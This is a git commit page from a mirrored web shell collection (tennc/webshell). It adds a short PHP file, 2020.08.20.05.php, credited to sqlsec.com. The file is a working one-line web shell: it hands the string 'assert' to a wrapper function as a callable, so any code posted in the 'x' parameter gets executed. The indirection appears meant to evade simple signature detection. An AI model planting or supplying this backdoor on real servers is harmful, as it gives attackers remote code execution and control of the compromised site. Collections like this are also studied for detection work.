1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create 2020.08.20.05.php

from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
tennc
2020-08-20 12:30:06 +08:00
committed by GitHub
parent 223d57c52c
commit d8cdd62ab1

7
php/2020.08.20.05.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>